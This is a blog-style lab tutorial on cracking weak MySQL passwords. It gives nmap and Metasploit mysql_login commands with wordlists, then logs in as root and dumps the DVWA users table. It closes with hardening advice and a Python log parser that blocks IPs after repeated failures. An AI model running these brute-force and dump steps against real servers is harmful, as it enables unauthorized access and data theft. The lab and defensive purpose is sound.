6-21 vulnerability exploitation MySQL weak password cracking
2022-07-29 02:44:00 【Mountain Rabbit 1】

MySQL introduction
MySQL is a relational database management system developed by the Swedish company MySQL AB and now owned by Oracle. It is one of the most popular relational database management systems, and for web applications it is the best RDBMS (Relational Database Management System) application software.
Each piece of data is stored in a table, and multiple tables are combined to hold the corresponding data. Primary keys, foreign keys and unique indexes link the values in different tables to each other. That is the outline of a relational database.
MySQL is a relational database management system. A relational database keeps data in different tables instead of putting all the data in one big warehouse. Non-relational databases, such as mydbs and MongoDB, store data in large memory rather than in large tables and have no concept of a table. Storing data in tables improves search speed and gives more flexibility.
Information about MySQL is available on the official MySQL website: https://www.mysql.com/
Detecting MySQL on the target
MySQL listens on port 3306 by default. Use nmap -sV -p 3306 <IP address> to detect the MySQL version information on the target.

nmap -sV -p 3306 192.168.42.137

Cracking the MySQL password with msf
Use the mysql_login module in msf to crack the MySQL login username and password.

msfconsole
use auxiliary/scanner/mysql/mysql_login
show options

set rhosts 192.168.1.105
show options

set user_file /home/kali/Desktop/user.txt
set pass_file /home/kali/Desktop/PASS.txt

show options
run

Once we have the MySQL username and password, we can log in with the mysql client and view the databases and the data stored in them.
Log in to the database to view the data
Use mysql -h <IP address> -u root to log in to the database system.
mysql -h 192.168.1.105 -u root
show databases;

use dvwa;
show tables;
select * from users;

The steps above use the cracked username to log in to the database and view the data.
The crack succeeds because the database credentials are too simple: the account is root, and its password is empty or some other simple password, which is easy to crack. To defend against this kind of probing, change the username and password to something complex so that they are not easy to crack. You can also set a threshold: after three failed logins, block the corresponding IP and deny logins from it for ten minutes, so that the password cannot be cracked quickly, or at all. We can change MySQL's default port, 3306, to another port to confuse detection. At the same time, do not allow MySQL to accept outside connections: allow only local connections through 127.0.0.1, or specify the particular IP addresses that may connect, so that not just any IP can connect to MySQL.
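The three-failures, ten-minute block described above can be driven from the server's own log. The following Python code is an added example, not part of the original post: it assumes failed logins appear in the MySQL error log as "Access denied for user" lines, the sample log lines are constructed, and the ten-minute counting window is an assumption the text does not specify.

```python
import re
from datetime import datetime, timedelta

MAX_FAILURES = 3                     # threshold named in the text
BLOCK_FOR = timedelta(minutes=10)    # block duration named in the text
WINDOW = timedelta(minutes=10)       # assumption: failures must fall inside this window

# Constructed sample lines in the style of the MySQL error log (not real data).
SAMPLE_LOG = """\
2022-07-29T02:44:01.100000Z 11 [Note] Access denied for user 'root'@'192.168.1.50' (using password: YES)
2022-07-29T02:44:01.900000Z 12 [Note] Access denied for user 'root'@'192.168.1.50' (using password: YES)
2022-07-29T02:44:02.300000Z 13 [Note] Access denied for user 'admin'@'192.168.1.50' (using password: YES)
2022-07-29T02:44:02.800000Z 14 [Note] Access denied for user 'test'@'192.168.1.50' (using password: NO)
2022-07-29T02:50:00.000000Z 15 [Note] Access denied for user 'app'@'10.0.0.7' (using password: YES)
2022-07-29T03:10:00.000000Z 16 [Note] Access denied for user 'app'@'10.0.0.7' (using password: YES)
2022-07-29T03:20:30.000000Z 17 [Note] Access denied for user 'app'@'10.0.0.7' (using password: YES)
"""

# The host part is an IP address only when the server does not resolve names.
DENIED = re.compile(
    r"^(?P<ts>\S+)Z .*Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'"
)

def find_blocks(log_text):
    """Return {ip: (blocked_from, blocked_until)} for sources that hit the threshold."""
    recent = {}   # ip -> timestamps of failures still inside WINDOW
    blocks = {}
    for line in log_text.splitlines():
        m = DENIED.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%f")
        ip = m["host"]
        if ip in blocks and ts < blocks[ip][1]:
            continue                  # source is already blocked at this time
        hits = [t for t in recent.get(ip, []) if ts - t <= WINDOW] + [ts]
        recent[ip] = hits
        if len(hits) >= MAX_FAILURES:
            blocks[ip] = (ts, ts + BLOCK_FOR)
            recent[ip] = []           # start counting afresh after the block
    return blocks

if __name__ == "__main__":
    for ip, (start, until) in find_blocks(SAMPLE_LOG).items():
        print(f"block {ip} from {start} until {until}")
```

The returned addresses are meant to be handed to whatever enforces the block, such as a host firewall. The second source in the sample fails three times but never inside one window, so it is not blocked.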